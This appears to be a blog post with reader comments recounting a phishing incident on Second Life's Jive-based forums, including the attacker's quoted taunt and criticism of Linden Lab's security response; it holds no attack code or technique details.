One result of this upgrade was to stop persistent log ins and thereby forcing people to log in every time they revisited the pages. I am sure that this forced increase of repeatedly having to log in with your account details and password suckered many people in to believing that Jive was just getting even more secure.
LL did though disable all PMs when made aware, but shortly after that a user with the account name "Nykon Brunsen" posted in a thread on General Discussions discussing the phishing incident the following message,
Nykon Brunsen wrote:
"Lindens... it was funny.. u have no limits to users in one PM =)
u scripted sending via ID, not name... That you have made the only thingcorrectly - have disabled PM. Here that I have received. Enjoy. PS. from russia with love^.^"
There then followed an 18 page table listing IP addresses, browsers used, account names and passwords of all those that he had captured through the phish. Whether it was the total amount or a small sample we do not know. I have reprinted an edited and extracted version below with IPs and passwords removed. Although LL say they have reset the passwords of all users who were sent the PM, whether they have opened the PM or not, some people are already saying that this is not the case.
The Flogs remain up today although all functionality/html has been disabled so it would seem the Flogs are still not secure to use. This is a big egg on their face moment for LL and Clearspace as it effectively shows that all of LL's security procedures were bypassed by one simple phishing exercise. Not only that, but it was conducted on one of their own sites over which they have received much criticism for their use of Clearspace's Jive software. The phishing exercise for the moment seems to have been done for non-malicious purposes so as to show LL how open their system was and how lacking Jive was in protecting them. So far I've not heard of any user reporting missing inventory or money. The posting of users' account names and passwords on a public forum though can only be considered ill thought and criminally negligent.
Below is a shortened list of users who were caught. There were 18 pages of names and passwords and I include only 2 extracted pages here with IPs and passwords deleted as an example. I had to chuckle at one of the users who was caught and who had used a really weak password. Last week they were boasting in a forum of how, with their long, long experience in IT and installing and maintaining big corporate networks, that they could run LL's data centres and that they would have avoided last week's outage. Good to see that such superheroes can get phished and don't know how to set a strong password. I hear too that Prokofy too was hooked by the phish, she'll be relieved to know that her details didn't appear on the list that I have.
Edit: Prok has a nice first person report of it here.
If your name appears here then I would advise you to change your password if not already reset by LL.
Seems like another wtg! for SL, all profit and no thought. They got told it was shit Im glad they found out the hard way.
ReplyDeleteYou wait and see, the Lindens will just slap a plaster on and say everything is ok. people will tell them it's still borked and they will pay no attention till the next time something happens.
ReplyDeleteIt's the new Tao of Linden, "Screw you people unless the lab is losing money!"
I looked allover the ll blogs and I cant find that user you mentioned or his post anywhere?????????
ReplyDeletethe Nykon Brunsen dude?????????
@ Anonymous
ReplyDeleteSorry anon, I should have said in my post that the blog mods moved in and removed his post, which was surprising given their usual snail's pace reaction to stuff on the blogs.
Luckily I left the page on one tab and revisited later on another tab and saw that it had been deleted; so I had a nice screendump available. :-)
It was in this thread I believe http://blogs.secondlife.com/thread/20957?tstart=30